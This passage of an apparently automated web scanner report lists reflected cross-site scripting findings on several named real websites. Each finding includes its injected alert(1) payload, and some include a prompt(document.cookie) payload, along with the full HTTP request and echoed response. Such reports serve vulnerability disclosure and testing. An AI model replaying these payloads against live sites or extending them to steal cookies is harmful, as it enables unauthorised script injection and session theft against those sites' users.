The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f77ea'-alert(1)-'58474860136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icof77ea'-alert(1)-'58474860136 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: Apache=50.23.123.106.1315147426262493; s_pers=%20s_pv%3Dhomepage%253AHomepage%7C1315149449865%3B; __utma=219500550.255216774.1315147627.1315147627.1315147627.1; __utmb=219500550.2.10.1315147627; __utmz=219500550.1315147627.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; lastTopStoryBlock=3; __utmc=219500550; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D20%3B; mobify=0; idglg_ref_domain=fakereferrerdominator.com; breakingnewsfilter=breakingnews-all

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79465
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:47:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:47:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
)',
           subtopic: '',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/favicon.icof77ea'-alert(1)-'58474860136',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_request_uri
...[SNIP]...

1.291. http://www.networkworld.com/includes/r08/demandbase.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/demandbase.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57cf1'-alert(1)-'234b39826f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes57cf1'-alert(1)-'234b39826f3/r08/demandbase.js?132 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 14:44:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:02 GMT
Content-Length: 82500
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
subtopicid: 0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes57cf1'-alert(1)-'234b39826f3/r08/demandbase.js?132',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)"
...[SNIP]...

1.292. http://www.networkworld.com/includes/r08/demandbase.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/demandbase.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c581b'-alert(1)-'6e2e1034af6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/r08c581b'-alert(1)-'6e2e1034af6/demandbase.js?132 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79676
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:44:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
subtopicid: 0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes/r08c581b'-alert(1)-'6e2e1034af6/demandbase.js?132',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
v
...[SNIP]...

1.293. http://www.networkworld.com/includes/r08/demandbase.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/demandbase.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c31'-alert(1)-'dae9a4b4a22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/r08/demandbase.jsb4c31'-alert(1)-'dae9a4b4a22?132 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79676
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:44:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
cid: 0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes/r08/demandbase.jsb4c31'-alert(1)-'dae9a4b4a22?132',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_request_
...[SNIP]...

1.294. http://www.networkworld.com/includes/r08/doubleclick_ads.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/doubleclick_ads.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 935c3'-alert(1)-'debfca9907a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes935c3'-alert(1)-'debfca9907a/r08/doubleclick_ads.js?2532 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82518
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:44:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
subtopicid: 0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes935c3'-alert(1)-'debfca9907a/r08/doubleclick_ads.js?2532',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(
...[SNIP]...

1.295. http://www.networkworld.com/includes/r08/doubleclick_ads.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/doubleclick_ads.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b4a4'-alert(1)-'2df4ae12fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/r086b4a4'-alert(1)-'2df4ae12fb/doubleclick_ads.js?2532 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79691
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:44:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
subtopicid: 0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes/r086b4a4'-alert(1)-'2df4ae12fb/doubleclick_ads.js?2532',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none
...[SNIP]...

1.296. http://www.networkworld.com/includes/r08/doubleclick_ads.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/includes/r08/doubleclick_ads.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931c1'-alert(1)-'e0d9aaaad30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /includes/r08/doubleclick_ads.js931c1'-alert(1)-'e0d9aaaad30?2532 HTTP/1.1
Host: www.networkworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1
Cookie: Apache=50.23.123.106.1315147426262493

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79694
Vary: Accept-Encoding
Expires: Sun, 04 Sep 2011 14:44:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:44:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
0,
outerref: 'http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1',
nwchannel: '(none)',
request_uri: '/includes/r08/doubleclick_ads.js931c1'-alert(1)-'e0d9aaaad30?2532',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'
};
}();
var jq_nodeid = "(none)";
var jq_request
...[SNIP]...

1.297. http://www.spamfighter.com/News_Show_Other.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spamfighter.com
Path:	/News_Show_Other.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5f99"><script>alert(1)</script>b43bbcbe795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News_Show_Other.asp?f5f99"><script>alert(1)</script>b43bbcbe795=1 HTTP/1.1
Host: www.spamfighter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Language: en
Last-Modified: Sun, 4 Sep 2011 15:14:48 GMT
Content-Type: text/html
debugtwotreegeo: US
debugtwotreexff: 50.23.123.106
debugsftfromtreeone: vhigh
debugsfcfromtreeone: US
Date: Sun, 04 Sep 2011 14:14:49 GMT
Connection: close
Connection: Transfer-Encoding
sft: vhigh
sfc: US
Cache-Control: Public
Expires: Sun, 04 Sep 2011 15:59:58 GMT
Content-Length: 100318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<a href="/News_Show_Other.asp?f5f99"><script>alert(1)</script>b43bbcbe795=1" hreflang="en">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14628"><script>alert(1)</script>719a07200bf was submitted in the REST URL parameter 10. This input was echoed as 14628\"><script>alert(1)</script>719a07200bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:14628"><script>alert(1)</script>719a07200bf/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
retty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:14628\"><script>alert(1)</script>719a07200bf/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 11 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcfab"><script>alert(1)</script>e8d5e9f27c was submitted in the REST URL parameter 11. This input was echoed as dcfab\"><script>alert(1)</script>e8d5e9f27c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:dcfab"><script>alert(1)</script>e8d5e9f27c/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
e.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:dcfab\"><script>alert(1)</script>e8d5e9f27c/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 12 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89924"><script>alert(1)</script>a9a3fd2e666 was submitted in the REST URL parameter 12. This input was echoed as 89924\"><script>alert(1)</script>a9a3fd2e666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com89924"><script>alert(1)</script>a9a3fd2e666/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
ylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com89924\"><script>alert(1)</script>a9a3fd2e666/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 13 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57800"><script>alert(1)</script>71b75a44ae was submitted in the REST URL parameter 13. This input was echoed as 57800\"><script>alert(1)</script>71b75a44ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com57800"><script>alert(1)</script>71b75a44ae/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
h.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com57800\"><script>alert(1)</script>71b75a44ae/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The value of REST URL parameter 14 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5400f"><script>alert(1)</script>236704c7ee2 was submitted in the REST URL parameter 14. This input was echoed as 5400f\"><script>alert(1)</script>236704c7ee2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com5400f"><script>alert(1)</script>236704c7ee2/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:16:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 14:16:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
